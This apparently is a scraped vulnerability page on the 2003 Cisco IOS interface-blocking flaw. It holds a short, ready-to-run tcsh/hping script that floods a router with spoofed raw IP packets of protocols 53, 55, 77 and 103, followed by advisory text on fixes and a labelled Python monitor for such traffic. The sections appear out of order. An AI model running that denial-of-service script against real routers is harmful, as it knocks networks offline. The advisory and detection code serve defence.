#!/bin/tcsh -f

if ($1 == "" || $2 == "") then
echo "usage: $0 <router hostname|address> <ttl>"
exit
endif

foreach protocol (53 55 77 103)
/usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 19 --interval u250 --data 26
end
---

Additional exploits have been made available by Michal Zalewski and Martin Kluge.

The following exploit is available:

- Solution

Further information regarding obtaining and applying fixes and workarounds can be found in the attached Cisco security advisory (cisco-sa-20030717). Some releases may not be available at this time, so users should also consult the advisory for further details regarding the availability of fixed releases.

The Symantec DeepSight Threat Management System has observed this vulnerability being exploited in the wild and considers it a high risk. Patches should be applied immediately; where this is not possible, administrators are advised to evaluate the applicability of all available workarounds.

** August 02, 2003 - Cisco has released revision 1.13 of the advisory detailing additional fix information for 12.0T and 12.1EC. See referenced advisory for additional details.
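
For monitoring while fixes are rolled out, the following added example (not part of the advisory or of Cisco's guidance) parses captured IPv4 headers and counts packets addressed to a router's own interfaces that carry one of the four IP protocol numbers named above. The address 192.0.2.1 is a stand-in router interface address, and the sample packets are constructed.

```python
import struct
from collections import Counter
from ipaddress import IPv4Address

# IP protocol numbers named in this advisory: SWIPE, IP Mobility, Sun ND, PIM
WATCHED_PROTOCOLS = {53, 55, 77, 103}

def parse_ipv4_header(raw: bytes):
    """Return (src, dst, protocol, ttl), or None if this is not a sane IPv4 header."""
    if len(raw) < 20:
        return None
    ver_ihl, _tos, total_len, _id, _frag, ttl, proto, _csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", raw[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or total_len < ihl or len(raw) < ihl:
        return None
    return IPv4Address(src), IPv4Address(dst), proto, ttl

def count_watched(packets, router_addresses):
    """Count watched-protocol packets addressed to the router's own interfaces."""
    own = {IPv4Address(a) for a in router_addresses}
    hits = Counter()
    for raw in packets:
        parsed = parse_ipv4_header(raw)
        if parsed is None:
            continue  # truncated or non-IPv4 data
        _src, dst, proto, _ttl = parsed
        if proto in WATCHED_PROTOCOLS and dst in own:
            hits[(str(dst), proto)] += 1
    return hits

def build_header(src, dst, proto, ttl=64):
    """Constructed test input: a bare 20-byte IPv4 header (checksum left at 0)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20, 0, 0, ttl, proto, 0,
                       IPv4Address(src).packed, IPv4Address(dst).packed)

# Constructed sample capture; 192.0.2.1 stands in for a router interface address.
SAMPLE = [
    build_header("198.51.100.7", "192.0.2.1", 53),
    build_header("198.51.100.9", "192.0.2.1", 103),
    build_header("198.51.100.9", "192.0.2.1", 103),
    build_header("198.51.100.7", "192.0.2.1", 6),     # TCP to the router: ignored
    build_header("198.51.100.7", "203.0.113.5", 77),  # transit traffic: ignored
    b"\x45\x00",                                      # truncated: ignored
]

if __name__ == "__main__":
    print(sorted(count_watched(SAMPLE, ["192.0.2.1"]).items()))
```

On networks that run PIM, protocol 103 traffic to a router address can be legitimate, so compare those counts against a known baseline rather than treating every hit as hostile.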

- References
